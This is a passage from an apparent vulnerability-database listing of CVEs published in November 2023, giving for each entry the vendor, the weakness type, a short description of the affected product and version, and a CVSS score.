Versions of the package chromedriver before 119.0.1 are vulnerable to Command Injection when setting the chromedriver.path to an arbitrary system binary.

7.5
2023-11-08 CVE-2023-36667 Couchbase Path Traversal vulnerability in Couchbase Server

Couchbase Server 7.1.4 before 7.1.5 and 7.2.0 before 7.2.1 allows Directory Traversal.

7.5
2023-11-08 CVE-2023-5079 Lenovo Improper Input Validation vulnerability in Lenovo Lecloud

Lenovo LeCloud App improper input validation allows attackers to access arbitrary components and arbitrary file downloads, which could result in information disclosure.

7.5
2023-11-08 CVE-2023-45875 Couchbase Unspecified vulnerability in Couchbase Server 7.2.0

An issue was discovered in Couchbase Server 7.2.0.

7.5
2023-11-08 CVE-2023-35767 Perforce Resource Exhaustion vulnerability in Perforce Helix Core

In Helix Core versions prior to 2023.2, an unauthenticated remote Denial of Service (DoS) via the shutdown function was identified.

7.5
2023-11-08 CVE-2023-45319 Perforce Unspecified vulnerability in Perforce Helix Core

In Helix Core versions prior to 2023.2, an unauthenticated remote Denial of Service (DoS) via the commit function was identified.

7.5
2023-11-08 CVE-2023-5759 Perforce Unspecified vulnerability in Perforce Helix Core

In Helix Core versions prior to 2023.2, an unauthenticated remote Denial of Service (DoS) via the buffer was identified.

7.5
2023-11-08 CVE-2023-46757 Huawei Unspecified vulnerability in Huawei Harmonyos 4.0.0

The remote PIN module has a vulnerability that causes incorrect information storage locations.Successful exploitation of this vulnerability may affect confidentiality.

7.5
2023-11-08 CVE-2023-46758 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Permission management vulnerability in the multi-screen interaction module.

7.5
2023-11-08 CVE-2023-46759 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Permission control vulnerability in the call module.

7.5
2023-11-08 CVE-2023-46760 Huawei Out-of-bounds Write vulnerability in Huawei Emui and Harmonyos

Out-of-bounds write vulnerability in the kernel driver module.

7.5
2023-11-08 CVE-2023-46761 Huawei Out-of-bounds Write vulnerability in Huawei Emui and Harmonyos

Out-of-bounds write vulnerability in the kernel driver module.

7.5
2023-11-08 CVE-2023-46762 Huawei Out-of-bounds Write vulnerability in Huawei Emui and Harmonyos

Out-of-bounds write vulnerability in the kernel driver module.

7.5
2023-11-08 CVE-2023-46765 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Vulnerability of uncaught exceptions in the NFC module.

7.5
2023-11-08 CVE-2023-46766 Huawei Out-of-bounds Write vulnerability in Huawei Emui and Harmonyos

Out-of-bounds write vulnerability in the kernel driver module.

7.5
2023-11-08 CVE-2023-46767 Huawei Out-of-bounds Write vulnerability in Huawei Emui and Harmonyos

Out-of-bounds write vulnerability in the kernel driver module.

7.5
2023-11-08 CVE-2023-46772 Huawei Out-of-bounds Write vulnerability in Huawei Emui 11.0.1

Vulnerability of parameters being out of the value range in the QMI service module.

7.5
2023-11-08 CVE-2023-46774 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Vulnerability of uncaught exceptions in the NFC module.

7.5
2023-11-08 CVE-2023-44098 Huawei Missing Encryption of Sensitive Data vulnerability in Huawei Emui and Harmonyos

Vulnerability of missing encryption in the card management module.

7.5
2023-11-08 CVE-2023-46771 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Security vulnerability in the face unlock module.

7.5
2023-11-08 CVE-2023-5978 Freebsd Unspecified vulnerability in Freebsd 13.0/13.1/13.2

In versions of FreeBSD 13-RELEASE before 13-RELEASE-p5, under certain circumstances the cap_net libcasper(3) service incorrectly validates that updated constraints are strictly subsets of the active constraints.

7.5
2023-11-08 CVE-2023-41111 Samsung Out-of-bounds Write vulnerability in Samsung products

An issue was discovered in Samsung Mobile Processor, Wearable Processor, Automotive Processor, and Modem (Exynos 9810, 9610, 9820, 980, 850, 1080, 2100, 2200, 1280, 1380, 1330, 9110, W920, Modem 5123, Modem 5300, and Auto T5123).

7.5
2023-11-08 CVE-2023-41112 Samsung Classic Buffer Overflow vulnerability in Samsung products

An issue was discovered in Samsung Mobile Processor, Wearable Processor, Automotive Processor, and Modem (Exynos 9810, 9610, 9820, 980, 850, 1080, 2100, 2200, 1280, 1380, 1330, 9110, W920, Modem 5123, Modem 5300, and Auto T5123).

7.5
2023-11-08 CVE-2023-44115 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Vulnerability of improper permission control in the Booster module.

7.5
2023-11-08 CVE-2023-46768 Huawei Use After Free vulnerability in Huawei Emui and Harmonyos

Multi-thread vulnerability in the idmap module.

7.5
2023-11-08 CVE-2023-46769 Huawei Use After Free vulnerability in Huawei Emui and Harmonyos

Use-After-Free (UAF) vulnerability in the dubai module.

7.5
2023-11-08 CVE-2023-46770 Huawei Out-of-bounds Write vulnerability in Huawei Emui and Harmonyos

Out-of-bounds vulnerability in the sensor module.

7.5
2023-11-08 CVE-2023-6001 Yugabyte Missing Authorization vulnerability in Yugabyte Yugabytedb

Prometheus metrics are available without authentication.

7.5
2023-11-07 CVE-2023-43984 Advanced Export Products Orders Cron CSV Excel Project Unspecified vulnerability in Advanced Export products Orders Cron CSV Excel Project Advanced Export products Orders Cron CSV Excel

Insecure permissions in Smart Soft advancedexport before v4.4.7 allow unauthenticated attackers to arbitrarily download user information from the ps_customer table.

7.5
2023-11-07 CVE-2021-43419 Opayweb Unspecified vulnerability in Opayweb Opay 1.5.1.26

An Information Disclosure vulnerability exists in Opay Mobile application 1.5.1.26 and maybe be higher in the logcat app.

7.5
2023-11-07 CVE-2023-5998 Gpac Out-of-bounds Read vulnerability in Gpac

Out-of-bounds Read in GitHub repository gpac/gpac prior to 2.3.0-DEV.

7.5
2023-11-07 CVE-2023-47360 Videolan Integer Underflow (Wrap or Wraparound) vulnerability in Videolan VLC Media Player

Videolan VLC prior to version 3.0.20 contains an Integer underflow that leads to an incorrect packet length.

7.5
2023-11-07 CVE-2023-0436 Mongodb Information Exposure Through Log Files vulnerability in Mongodb Atlas Kubernetes Operator

The affected versions of MongoDB Atlas Kubernetes Operator may print sensitive information like GCP service account keys and API integration secrets while DEBUG mode logging is enabled.

7.5
2023-11-07 CVE-2023-42530 Samsung Unspecified vulnerability in Samsung Android 11.0/12.0

Improper access control vulnerability in SecSettings prior to SMR Nov-2023 Release 1 allows attackers to enable Wi-Fi and Wi-Fi Direct without User Interaction.

7.5
2023-11-07 CVE-2023-42532 Samsung Improper Certificate Validation vulnerability in Samsung Android 11.0/12.0

Improper Certificate Validation in FotaAgent prior to SMR Nov-2023 Release1 allows remote attacker to intercept the network traffic including Firmware information.

7.5
2023-11-07 CVE-2023-42543 Samsung Unspecified vulnerability in Samsung Bixby Voice 3.0.52.14/3.1.12

Improper verification of intent by broadcast receiver vulnerability in Bixby Voice prior to version 3.3.35.12 allows attackers to access arbitrary data with Bixby Voice privilege.

7.5
2023-11-07 CVE-2023-42545 Samsung Unspecified vulnerability in Samsung Phone

Use of implicit intent for sensitive communication vulnerability in Phone prior to versions 12.7.20.12 in Android 11, 13.1.48, 13.5.28 in Android 12, and 14.7.38 in Android 13 allows attackers to access location data.

7.5
2023-11-07 CVE-2023-33047 Qualcomm Out-of-bounds Read vulnerability in Qualcomm products

Transient DOS in WLAN Firmware while parsing no-inherit IES.

7.5
2023-11-07 CVE-2023-33048 Qualcomm Out-of-bounds Read vulnerability in Qualcomm products

Transient DOS in WLAN Firmware while parsing t2lm buffers.

7.5
2023-11-07 CVE-2023-33056 Qualcomm NULL Pointer Dereference vulnerability in Qualcomm products

Transient DOS in WLAN Firmware when firmware receives beacon including T2LM IE.

7.5
2023-11-07 CVE-2023-33061 Qualcomm Out-of-bounds Read vulnerability in Qualcomm products

Transient DOS in WLAN Firmware while parsing WLAN beacon or probe-response frame.

7.5
2023-11-06 CVE-2023-5454 Templately Missing Authorization vulnerability in Templately

The Templately WordPress plugin before 2.2.6 does not properly authorize the `saved-templates/delete` REST API call, allowing unauthenticated users to delete arbitrary posts.

7.5
2023-11-06 CVE-2022-48193 Softing Inadequate Encryption Strength vulnerability in Softing Smartlink Sw-Ht

Weak ciphers in Softing smartLink SW-HT before 1.30 are enabled during secure communication (SSL).

7.5
2023-11-06 CVE-2023-39345 Strapi Improper Authentication vulnerability in Strapi

strapi is an open-source headless CMS.

7.5
2023-11-06 CVE-2023-46728 Squid Cache NULL Pointer Dereference vulnerability in Squid-Cache Squid

Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more.

7.5
2023-11-06 CVE-2023-41378 Tigera Improper Handling of Exceptional Conditions vulnerability in Tigera Calico Cloud, Calico Enterprise and Calico OS

In certain conditions for Calico Typha (v3.26.2, v3.25.1 and below), and Calico Enterprise Typha (v3.17.1, v3.16.3, v3.15.3 and below), a client TLS handshake can block the Calico Typha server indefinitely, resulting in denial of service.

7.5
2023-11-06 CVE-2021-4430 Ortussolutions Unspecified vulnerability in Ortussolutions Coldbox Elixir 3.1.6

A vulnerability classified as problematic has been found in Ortus Solutions ColdBox Elixir 3.1.6.

7.5
2023-11-06 CVE-2023-38407 Frrouting Unspecified vulnerability in Frrouting

bgpd/bgp_label.c in FRRouting (FRR) before 8.5 attempts to read beyond the end of the stream during labeled unicast parsing.

7.5
2023-11-06 CVE-2023-20702 Mediatek Unspecified vulnerability in Mediatek Nr15, Nr16 and Nr17

In 5G NRLC, there is a possible invalid memory access due to lack of error handling.

7.5
2023-11-10 CVE-2023-36014 Microsoft Unspecified vulnerability in Microsoft Edge Chromium

Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability

7.3
2023-11-08 CVE-2023-47113 Bleachbit Uncontrolled Search Path Element vulnerability in Bleachbit

BleachBit cleans files to free disk space and to maintain privacy.

7.3
2023-11-07 CVE-2023-0898 GE Uncontrolled Search Path Element vulnerability in GE Micom S1 Agile

General Electric MiCOM S1 Agile is vulnerable to an attacker achieving code execution by placing malicious DLL files in the directory of the application.

7.3
2023-11-10 CVE-2023-23367 Qnap OS Command Injection vulnerability in Qnap Qts, Quts Hero and Qutscloud

An OS command injection vulnerability has been reported to affect several QNAP operating system versions.

7.2
2023-11-09 CVE-2023-29975 Pfsense Improper Authentication vulnerability in Pfsense 2.6.0

An issue discovered in Pfsense CE version 2.6.0 allows attackers to change the password of any user without verification.

7.2
2023-11-07 CVE-2023-46253 Squidex IO Path Traversal vulnerability in Squidex.Io Squidex 7.8.2

Squidex is an open source headless CMS and content management hub.

7.2
2023-11-07 CVE-2022-45078 Solwininfotech Improper Neutralization of Formula Elements in a CSV File vulnerability in Solwininfotech User Blocker

Improper Neutralization of Formula Elements in a CSV File vulnerability in Solwin Infotech User Blocker.This issue affects User Blocker: from n/a through 1.5.5.

7.2
2023-11-07 CVE-2023-23678 Wpeka Improper Neutralization of Formula Elements in a CSV File vulnerability in Wpeka WP Cookie Consent

Improper Neutralization of Formula Elements in a CSV File vulnerability in WPEkaClub WP Cookie Consent ( for GDPR, CCPA & ePrivacy ).This issue affects WP Cookie Consent ( for GDPR, CCPA & ePrivacy ): from n/a through 2.2.5.

7.2
2023-11-07 CVE-2023-46845 EC Cube Code Injection vulnerability in Ec-Cube

EC-CUBE 3 series (3.0.0 to 3.0.18-p6) and 4 series (4.0.0 to 4.0.6-p3, 4.1.0 to 4.1.2-p2, and 4.2.0 to 4.2.2) contain an arbitrary code execution vulnerability due to improper settings of the template engine Twig included in the product.

7.2
2023-11-06 CVE-2023-5082 Click5Interactive SQL Injection vulnerability in Click5Interactive Sitemap BY Click5

The History Log by click5 WordPress plugin before 1.0.13 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin users when using the Smash Balloon Social Photo Feed plugin alongside it.

7.2
2023-11-06 CVE-2023-45161 1E Unspecified vulnerability in 1E Platform

The 1E-Exchange-URLResponseTime instruction that is part of the Network product pack available on the 1E Exchange does not properly validate the URL parameter, which allows for a specially crafted input to perform arbitrary code execution with SYSTEM permissions.

7.2
2023-11-06 CVE-2023-45163 1E Unspecified vulnerability in 1E Platform 8.1.2/8.4.1/9.0.1

The 1E-Exchange-CommandLinePing instruction that is part of the Network product pack available on the 1E Exchange does not properly validate the input parameter, which allows for a specially crafted input to perform arbitrary code execution with SYSTEM permissions.

7.2
2023-11-06 CVE-2023-5964 1E Unspecified vulnerability in 1E Platform

The 1E-Exchange-DisplayMessageinstruction that is part of the End-User Interaction product pack available on the 1E Exchange does not properly validate the Caption or Message parameters, which allows for a specially crafted input to perform arbitrary code execution with SYSTEM permissions.

7.2
2023-11-06 CVE-2023-46821 Dev4Press SQL Injection vulnerability in Dev4Press GD Security Headers

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Milan Petrovic GD Security Headers allows auth.

7.2
2023-11-06 CVE-2023-46823 Avirtum SQL Injection vulnerability in Avirtum Imagelinks

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Avirtum ImageLinks Interactive Image Builder for WordPress allows SQL Injection.This issue affects ImageLinks Interactive Image Builder for WordPress: from n/a through 1.5.4.

7.2
2023-11-10 CVE-2023-36024 Microsoft Unspecified vulnerability in Microsoft Edge Chromium

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

7.1
2023-11-09 CVE-2023-47613 Telit Path Traversal vulnerability in Telit products

A CWE-23: Relative Path Traversal vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to escape from virtual directories and get read/write access to protected files on the targeted system.

7.1
2023-11-07 CVE-2023-42531 Samsung Improper Authentication vulnerability in Samsung Android 11.0/12.0

Improper access control vulnerability in SmsController prior to SMR Nov-2023 Release1 allows local attackers to bypass restrictions on starting activities from the background.

7.1
2023-11-07 CVE-2023-43886 Tenda Out-of-bounds Write vulnerability in Tenda RX9 PRO Firmware 22.03.02.10

A buffer overflow in the HTTP server component of Tenda RX9 Pro v22.03.02.20 might allow an authenticated attacker to overwrite memory.

7.1
2023-11-08 CVE-2023-5760 Avast Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Avast AVG Antivirus 23.8

A time-of-check to time-of-use (TOCTOU) bug in handling of IOCTL (input/output control) requests.

7.0
2023-11-06 CVE-2023-32832 Google Out-of-bounds Write vulnerability in Google Android 12.0/13.0

In video, there is a possible memory corruption due to a race condition.

7.0

238 Medium Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-07 CVE-2023-42533 Samsung Unspecified vulnerability in Samsung Android 12.0/13.0

Improper Input Validation with USB Gadget Interface prior to SMR Nov-2023 Release 1 allows a physical attacker to execute arbitrary code in Kernel.

6.8
2023-11-07 CVE-2023-42554 Samsung Improper Authentication vulnerability in Samsung Pass 4.0.05.1/4.2.03.1

Improper Authentication vulnerabiity in Samsung Pass prior to version 4.3.00.17 allows physical attackers to bypass authentication.

6.8
2023-11-10 CVE-2023-4949 GNU
XEN
Out-of-bounds Write vulnerability in multiple products

An attacker with local access to a system (either through a disk or external drive) can present a modified XFS partition to grub-legacy in such a way to exploit a memory corruption in grub’s XFS file system implementation.

6.7
2023-11-09 CVE-2023-41138 Appsanywhere Unspecified vulnerability in Appsanywhere Client

The AppsAnywhere macOS client-privileged helper can be tricked into executing arbitrary commands with elevated permissions by a local user process.

6.7
2023-11-08 CVE-2023-43571 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the BiosExtensionLoader module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43573 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the LEMALLDriversConnectedEventHook module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43575 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the UltraFunctionTable module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43576 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the WMISwSmi module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43577 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the ReFlash module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43578 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the SmiFlash module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43579 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the SmuV11Dxe driver in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43580 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the SmuV11DxeVMR module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43581 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the Update_WMI module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-45075 Lenovo Out-of-bounds Read vulnerability in Lenovo products

A memory leakage vulnerability was reported in the SWSMI_Shadow DXE driver that may allow a local attacker with elevated privileges to write to NVRAM variables.

6.7
2023-11-08 CVE-2023-45076 Lenovo Out-of-bounds Read vulnerability in Lenovo products

A memory leakage vulnerability was reported in the 534D0140 DXE driver that may allow a local attacker with elevated privileges to write to NVRAM variables.

6.7
2023-11-08 CVE-2023-45077 Lenovo Out-of-bounds Read vulnerability in Lenovo products

A memory leakage vulnerability was reported in the 534D0740 DXE driver that may allow a local attacker with elevated privileges to write to NVRAM variables.

6.7
2023-11-08 CVE-2023-45078 Lenovo Out-of-bounds Read vulnerability in Lenovo products

A memory leakage vulnerability was reported in the DustFilterAlertSmm SMM driver that may allow a local attacker with elevated privileges to write to NVRAM variables.

6.7
2023-11-08 CVE-2023-45079 Lenovo Out-of-bounds Read vulnerability in Lenovo products

A memory leakage vulnerability was reported in the NvmramSmm SMM driver that may allow a local attacker with elevated privileges to write to NVRAM variables.

6.7
2023-11-08 CVE-2023-43567 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the LemSecureBootForceKey module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-43569 Lenovo Classic Buffer Overflow vulnerability in Lenovo products

A buffer overflow was reported in the OemSmi module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to execute arbitrary code. 

6.7
2023-11-08 CVE-2023-43570 Lenovo Improper Input Validation vulnerability in Lenovo products

A potential vulnerability was reported in the SMI callback function of the OemSmi driver that may allow a local attacker with elevated permissions to execute arbitrary code.

6.7
2023-11-08 CVE-2023-5075 Lenovo Classic Buffer Overflow vulnerability in Lenovo Ideapad Duet 3 10Igl5 Firmware Eqcn37Ww

A buffer overflow was reported in the FmpSipoCapsuleDriver driver in the IdeaPad Duet 3-10IGL5 that may allow a local attacker with elevated privileges to execute arbitrary code.

6.7
2023-11-08 CVE-2023-5078 Lenovo Improper Initialization vulnerability in Lenovo products

A vulnerability was reported in some ThinkPad BIOS that could allow a physical or local attacker with elevated privileges to tamper with BIOS firmware.

6.7
2023-11-08 CVE-2023-0392 Okta Unquoted Search Path or Element vulnerability in Okta Ldap Agent

The LDAP Agent Update service with versions prior to 5.18 used an unquoted path, which could allow arbitrary code execution.

6.7
2023-11-08 CVE-2023-3282 Paloaltonetworks Incorrect Permission Assignment for Critical Resource vulnerability in Paloaltonetworks Cortex Xsoar

A local privilege escalation (PE) vulnerability in the Palo Alto Networks Cortex XSOAR engine software running on a Linux operating system enables a local attacker to execute programs with elevated privileges if the attacker has shell access to the engine.

6.7
2023-11-06 CVE-2023-32818 Google Type Confusion vulnerability in Google Android 11.0/12.0/13.0

In vdec, there is a possible out of bounds write due to type confusion.

6.7
2023-11-06 CVE-2023-32834 Google Type Confusion vulnerability in Google Android 11.0/12.0/13.0

In secmem, there is a possible memory corruption due to type confusion.

6.7
2023-11-06 CVE-2023-32835 Google Type Confusion vulnerability in Google Android 11.0/12.0/13.0

In keyinstall, there is a possible memory corruption due to type confusion.

6.7
2023-11-06 CVE-2023-32836 Google Out-of-bounds Write vulnerability in Google Android 11.0/12.0/13.0

In display, there is a possible out of bounds write due to an integer overflow.

6.7
2023-11-06 CVE-2023-32838 Google Out-of-bounds Write vulnerability in Google Android 11.0/12.0

In dpe, there is a possible out of bounds write due to a missing valid range checking.

6.7
2023-11-06 CVE-2023-32839 Google Out-of-bounds Write vulnerability in Google Android 11.0/12.0

In dpe, there is a possible out of bounds write due to a missing valid range checking.

6.7
2023-11-06 CVE-2023-40660 Opensc Project
Redhat
Improper Authentication vulnerability in multiple products

A flaw was found in OpenSC packages that allow a potential PIN bypass.

6.6
2023-11-12 CVE-2023-42781 Apache Unspecified vulnerability in Apache Airflow

Apache Airflow, versions before 2.7.3, has a vulnerability that allows an authorized user who has access to read specific DAGs only, to read information about task instances in other DAGs.  This is a different issue than CVE-2023-42663 but leading to similar outcome. Users of Apache Airflow are advised to upgrade to version 2.7.3 or newer to mitigate the risk associated with this vulnerability.

6.5
2023-11-10 CVE-2023-46733 Sensiolabs Session Fixation vulnerability in Sensiolabs Symfony

Symfony is a PHP framework for web and console applications and a set of reusable PHP components.

6.5
2023-11-09 CVE-2023-45884 Nasa Cross-Site Request Forgery (CSRF) vulnerability in Nasa Openmct

Cross Site Request Forgery (CSRF) vulnerability in NASA Open MCT (aka openmct) through 3.1.0 allows attackers to view sensitive information via the flexibleLayout plugin.

6.5
2023-11-09 CVE-2023-47368 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in taketorinoyu Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47370 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in bluetrick Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47372 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in UPDATESALON C-LOUNGE Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47373 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in DRAGON FAMILY Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47363 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in F.B.P members Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47364 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in nagaoka taxi Line 13.6.1 allows remote attackers to send malicious notifications to victims

6.5
2023-11-09 CVE-2023-47365 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in Lil.OFF-PRICE STORE Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47366 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in craft_members Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47367 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in platinum clinic Line 13.6.1 allows remote attackers to send malicious notifications to victims.

6.5
2023-11-09 CVE-2023-47369 Linecorp Inadequate Encryption Strength vulnerability in Linecorp Line 13.6.1

The leakage of channel access token in best_training_member Line 13.6.1 allows remote attackers to send malicious notifications.

6.5
2023-11-09 CVE-2023-20902 Linuxfoundation Race Condition vulnerability in Linuxfoundation Harbor

A timing condition in Harbor 2.6.x and below, Harbor 2.7.2 and below,  Harbor 2.8.2 and below, and Harbor 1.10.17 and below allows an attacker with network access to create jobs/stop job tasks and retrieve job task information.

6.5
2023-11-08 CVE-2023-45857 Axios Cross-Site Request Forgery (CSRF) vulnerability in Axios 1.5.1

An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

6.5
2023-11-08 CVE-2023-4061 Redhat Unspecified vulnerability in Redhat products

A flaw was found in wildfly-core.

6.5
2023-11-07 CVE-2023-4154 Samba Out-of-bounds Write vulnerability in Samba

A design flaw was found in Samba's DirSync control implementation, which exposes passwords and secrets in Active Directory to privileged users and Read-Only Domain Controllers (RODCs).

6.5
2023-11-07 CVE-2023-5709 WEB Dorado SQL Injection vulnerability in Web-Dorado WD Widgettwitter

The WD WidgetTwitter plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 1.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.

6.5
2023-11-07 CVE-2023-42546 Samsung Exposure of Resource to Wrong Sphere vulnerability in Samsung Account

Use of implicit intent for sensitive communication vulnerability in startAgreeToDisclaimerActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege.

6.5
2023-11-07 CVE-2023-42547 Samsung Exposure of Resource to Wrong Sphere vulnerability in Samsung Account

Use of implicit intent for sensitive communication vulnerability in startEmailValidationActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege.

6.5
2023-11-07 CVE-2023-42548 Samsung Unspecified vulnerability in Samsung Account

Use of implicit intent for sensitive communication vulnerability in startMandatoryCheckActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege.

6.5
2023-11-07 CVE-2023-42549 Samsung Exposure of Resource to Wrong Sphere vulnerability in Samsung Account

Use of implicit intent for sensitive communication vulnerability in startNameValidationActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege.

6.5
2023-11-07 CVE-2023-42550 Samsung Unspecified vulnerability in Samsung Account

Use of implicit intent for sensitive communication vulnerability in startSignIn in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege.

6.5
2023-11-07 CVE-2023-42551 Samsung Exposure of Resource to Wrong Sphere vulnerability in Samsung Account

Use of implicit intent for sensitive communication vulnerability in startTncActivity in Samsung Account prior to version 14.5.00.7 allows attackers to access arbitrary file with Samsung Account privilege.

6.5
2023-11-07 CVE-2023-40453 Docker Unspecified vulnerability in Docker Machine

Docker Machine through 0.16.2 allows an attacker, who has control of a worker node, to provide crafted version data, which might potentially trick an administrator into performing an unsafe action (via escape sequence injection), or might have a data size that causes a denial of service to a bastion node.

6.5
2023-11-07 CVE-2023-36409 Microsoft Unspecified vulnerability in Microsoft Edge Chromium

Microsoft Edge (Chromium-based) Information Disclosure Vulnerability

6.5
2023-11-06 CVE-2023-4930 Shamimsplugins Files or Directories Accessible to External Parties vulnerability in Shamimsplugins Front END PM

The Front End PM WordPress plugin before 11.4.3 does not block listing the contents of the directories where it stores attachments to private messages, allowing unauthenticated visitors to list and download private attachments if the autoindex feature of the web server is enabled.

6.5
2023-11-06 CVE-2023-4700 Gitlab Unspecified vulnerability in Gitlab

An authorization issue affecting GitLab EE affecting all versions from 14.7 prior to 16.3.6, 16.4 prior to 16.4.2, and 16.5 prior to 16.5.1, allowed a user to run jobs in protected environments, bypassing any required approvals.

6.5
2023-11-06 CVE-2023-3909 Gitlab Resource Exhaustion vulnerability in Gitlab

An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.3 before 16.3.6, all versions starting from 16.4 before 16.4.2, all versions starting from 16.5 before 16.5.1.

6.5
2023-11-06 CVE-2023-5825 Gitlab Resource Exhaustion vulnerability in Gitlab

An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.2 before 16.3.6, all versions starting from 16.4 before 16.4.2, all versions starting from 16.5 before 16.5.1.

6.5
2023-11-06 CVE-2023-28794 Zscaler Origin Validation Error vulnerability in Zscaler Client Connector 1.3/1.3.0.31/1.3.1

Origin Validation Error vulnerability in Zscaler Client Connector on Linux allows Privilege Abuse.

6.5
2023-11-06 CVE-2023-42669 Samba
Redhat
A vulnerability was found in Samba's "rpcecho" development server, a non-Windows RPC server used to test Samba's DCE/RPC stack elements.
6.5
2023-11-06 CVE-2023-32840 Mediatek Out-of-bounds Write vulnerability in Mediatek products

In modem CCCI, there is a possible out of bounds write due to a missing bounds check.

6.5
2023-11-09 CVE-2023-39198 Linux
Fedoraproject
Redhat
Use After Free vulnerability in multiple products

A race condition was found in the QXL driver in the Linux kernel.

6.4
2023-11-06 CVE-2023-40661 Opensc Project
Redhat
Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in multiple products

Several memory vulnerabilities were identified within the OpenSC packages, particularly in the card enrollment process using pkcs15-init when a user or administrator enrolls cards.

6.4
2023-11-10 CVE-2023-36027 Microsoft Unspecified vulnerability in Microsoft Edge Chromium

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

6.3
2023-11-10 CVE-2023-6073 Volkswagen Unspecified vulnerability in Volkswagen Id.3 Firmware

Attacker can perform a Denial of Service attack to crash the ICAS 3 IVI ECU in a Volkswagen ID.3 (and other vehicles of the VW Group with the same hardware) and spoof volume setting commands to irreversibly turn on audio volume to maximum via REST API calls.

6.3
2023-11-10 CVE-2023-46734 Sensiolabs Cross-site Scripting vulnerability in Sensiolabs Symfony

Symfony is a PHP framework for web and console applications and a set of reusable PHP components.

6.1
2023-11-10 CVE-2023-46735 Sensiolabs Cross-site Scripting vulnerability in Sensiolabs Symfony

